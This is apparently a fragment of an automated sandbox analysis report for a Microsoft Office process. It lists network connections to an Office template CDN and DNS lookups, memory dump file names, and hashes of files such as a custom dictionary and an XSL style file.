GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
GB | 104.77.160.197:443 | binaries.templates.cdn.office.net | tcp
US | 8.8.8.8:53 | 107.76.16.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 197.160.77.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 24.66.18.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp

Files

memory/1076-1-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-3-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-2-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-0-0x00007FF9F7BED000-0x00007FF9F7BEE000-memory.dmp

memory/1076-4-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-5-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-6-0x00007FF9B7BD0000-0x00007FF9B7BE0000-memory.dmp

memory/1076-7-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-10-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-11-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-12-0x00007FF9B5270000-0x00007FF9B5280000-memory.dmp

memory/1076-9-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-8-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-14-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-16-0x00007FF9B5270000-0x00007FF9B5280000-memory.dmp

memory/1076-15-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-19-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-18-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-17-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-13-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/1076-37-0x00007FF9F7BED000-0x00007FF9F7BEE000-memory.dmp

memory/1076-38-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-39-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

memory/1076-40-0x00007FF9F7B50000-0x00007FF9F7D45000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 23e1abb3bd27eafe4b6c805191396e80
SHA1 b7d02c139ba96049b63df3864f3853da9af9e75a
SHA256 9551283cbacddde65f203fec1234434766976011adc800dc851fb29e81348a66
SHA512 f27db6eff9034560883c7b2a29740c63ece747623a0e8abaddb936fbee8ad7bf5d6ad466921d5c2a2000f00dbee24b444720c19732d55b1ffbf4b6e985dfd556

C:\Users\Admin\AppData\Local\Temp\TCDE311.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e